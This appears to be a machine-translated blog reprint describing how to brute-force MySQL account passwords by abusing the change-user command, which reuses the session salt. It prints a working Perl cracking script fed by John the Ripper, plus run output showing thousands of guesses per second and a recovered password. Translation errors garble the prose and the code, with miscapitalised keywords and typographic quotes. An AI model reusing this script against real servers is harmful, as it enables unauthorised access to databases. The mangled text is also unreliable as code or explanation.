Fast and efficient hacking of MySQL local and remote passwords

Http://www.kankanews.com/ICkengine/archives/212.shtml

Fast MySQL local and remote password cracking! The first thing that needs to be said to the database maintainer is that you don't have to be nervous, you don't have to fix the problem, it looks like a small mistake.

I found a way to hack MySQL's user passwords very efficiently, including local Users and user passwords accessed over the network. In my test, 5,000 passwords are tested per second by means of a network method.

Here's how:

An attacker uses an unprivileged account to log on to the MySQL server, and MySQL has a command called Change_user, which can be used to name suggestions when modifying a user in a MySQL session. Because this command executes very quickly, it can be used very quickly to hack the MySQL password instead of reconnecting to the MySQL server every time.

What causes very slow?

Because using the Change_user command does not change the salt (which is a weakness), the usual way to hack the password is to send a different salt to the server each time the connection is made.

Here is a Perl script that uses the John the Ripper method to generate the password:

The test user is Crackme password is pass, only a few seconds can be cracked.

(approximately 20 seconds to test 100,000 passwords)

The test script is as follows:
Use Net::mysql;

$|=1;

My $mysql = Net::mysql->new (
hostname = ' 192.168.2.3′,
Database = ' Test ',
user = "User",
Password = "Secret",
debug = 0,
);

$crackuser = "Crackme";

while (<stdin>) {
Chomp
$currentpass = $_;

$VV = join "",
$crackuser,
"\x14″.
Net::mysql::P assword->scramble (
$currentpass, $mysql->{salt}, $mysql->{client_capabilities}
) . “”;
if ($mysql->_execute_command ("\x11″, $VV) ne undef) {
Print "[*] cracked! –> $currentpass \ n ";
Exit
}
}

Here are the results of my execution on this machine:
C:\users\kingcope\desktop>c:\users\kingcope\desktop\john179\run\jo

hn–incremental–stdout=5 | Perl mysqlcrack.pl
Warning:maxlen = 8 is too large for the current hash type, reduced to 5
words:16382 time:0:00:00:02 w/s: 6262 current:citch
words:24573 time:0:00:00:04 w/s: 4916 current:rap
words:40956 time:0:00:00:07 w/s: 5498 current:matc3
words:49147 time:0:00:00:09 w/s: 5030 current:4429
words:65530 time:0:00:00:12 w/s: 5354 current:ch141
words:73721 time:0:00:00:14 w/s: 5021 current:v3n
words:90104 time:0:00:00:17 w/s: 5277 current:pun2
[*] cracked! –> Pass
words:98295 time:0:00:00:18 w/s: 5434 current:43gs

Session aborted

No tags for this post.

Unless indicated, this site article is original or compiles, reprint please specify: Article from Kengine | Kankanews.com

Fast and efficient hacking of MySQL local and remote passwords